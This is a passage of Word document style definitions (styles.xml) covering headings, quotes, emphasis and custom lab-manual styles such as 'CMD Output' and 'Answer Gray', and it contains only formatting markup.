    <w:uiPriority w:val="11"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1084">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:link w:val="1085"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:before="160"/>
      <w:ind/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1085">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1084"/>
    <w:uiPriority w:val="29"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1086">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1087">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:link w:val="10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88">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1087"/>
    <w:uiPriority w:val="30"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1089">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1090">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="1099"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1091">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1092">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1093">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1094">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="5a5a5a" w:themeColor="text1" w:themeTint="A5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1095">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1096">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1097">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1098">
    <w:name w:val="TOC Heading"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1099" w:default="1">
    <w:name w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl w:val="true"/>
      <w:pBdr/>
      <w:bidi w:val="false"/>
      <w:spacing w:after="60" w:before="60" w:line="276" w:lineRule="auto"/>
      <w:ind/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1100">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1170"/>
    <w:link w:val="1110"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines w:val="true"/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1101">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1170"/>
    <w:link w:val="1111"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1102">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:link w:val="1131"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1103">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="1170"/>
    <w:next w:val="1170"/>
    <w:link w:val="1125"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0"/>
      <w:ind w:firstLine="0" w:left="720"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:bCs/>
      <w:color w:val="ffffff" w:themeColor="background1"/>
      <w:sz w:val="6"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1104">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:link w:val="1126"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="60" w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1105">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:link w:val="1127"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="60" w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1106">
    <w:name w:val="Heading 7"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:link w:val="1128"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="60" w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1107">
    <w:name w:val="Heading 8"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:link w:val="1129"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="60" w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1108">
    <w:name w:val="Heading 9"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:link w:val="1130"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="60" w:before="240" w:line="240" w:lineRule="auto"/>
      <w:ind/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1109" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1110" w:customStyle="1">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="1100"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1111" w:customStyle="1">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="1101"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1112" w:customStyle="1">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1157"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1113" w:customStyle="1">
    <w:name w:val="Footer Char"/>
    <w:link w:val="1158"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1114" w:customStyle="1">
    <w:name w:val="Balloon Text Char"/>
    <w:link w:val="1159"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1115" w:customStyle="1">
    <w:name w:val="Table Text Char"/>
    <w:link w:val="1160"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1116" w:customStyle="1">
    <w:name w:val="Document Map Char"/>
    <w:link w:val="1174"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1117" w:customStyle="1">
    <w:name w:val="Lab Title Inst Vers (red)"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:color w:val="ee0000"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1118" w:customStyle="1">
    <w:name w:val="Answer Gray"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="bfbfbf"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1119" w:customStyle="1">
    <w:name w:val="Lab Section Gray"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b w:val="0"/>
      <w:sz w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="bfbfbf"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1120" w:customStyle="1">
    <w:name w:val="DevConfig Gray"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:shd w:val="clear" w:color="auto" w:fill="bfbfbf"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1121" w:customStyle="1">
    <w:name w:val="HTML Preformatted Char"/>
    <w:link w:val="1179"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1122">
    <w:name w:val="annotation reference"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1123" w:customStyle="1">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1180"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="1124" w:customStyle="1">
    <w:name w:val="Comment Subject Char"/>
    <w:link w:val="1181"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1125" w:customStyle="1">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1103"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:bCs/>
      <w:color w:val="ffffff" w:themeColor="background1"/>
      <w:sz w:val="6"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1126" w:customStyle="1">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1104"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1127" w:customStyle="1">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1105"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1128" w:customStyle="1">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1106"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1129" w:customStyle="1">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1107"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1130" w:customStyle="1">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1108"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1131" w:customStyle="1">
    <w:name w:val="Heading 3 Char"/>
    <w:link w:val="1102"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1132" w:customStyle="1">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1183"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1133" w:customStyle="1">
    <w:name w:val="Footnote Text Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1184"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1134" w:customStyle="1">
    <w:name w:val="Macro Text Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1195"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1135" w:customStyle="1">
    <w:name w:val="Body Text Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1136" w:customStyle="1">
    <w:name w:val="CMD Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1168"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1137" w:customStyle="1">
    <w:name w:val="Body Text Bold Char"/>
    <w:basedOn w:val="1135"/>
    <w:link w:val="1209"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:b/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1138" w:customStyle="1">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1210"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1139">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1140" w:customStyle="1">
    <w:name w:val="CMD Red Char"/>
    <w:basedOn w:val="1136"/>
    <w:link w:val="1211"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:color w:val="ee0000"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1141" w:customStyle="1">
    <w:name w:val="Body Text L25 Char"/>
    <w:basedOn w:val="1109"/>
    <w:link w:val="1170"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1142" w:customStyle="1">
    <w:name w:val="CMD Output Char"/>
    <w:basedOn w:val="1141"/>
    <w:link w:val="1176"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1143" w:customStyle="1">
    <w:name w:val="CMD Output Red Char"/>
    <w:basedOn w:val="1142"/>
    <w:link w:val="1212"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:color w:val="ee0000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1144">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0000ff" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1145">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="605e5c"/>
      <w:shd w:val="clear" w:color="auto" w:fill="e1dfdd"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1146">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="1109"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1147">
    <w:name w:val="Heading"/>
    <w:basedOn w:val="1099"/>
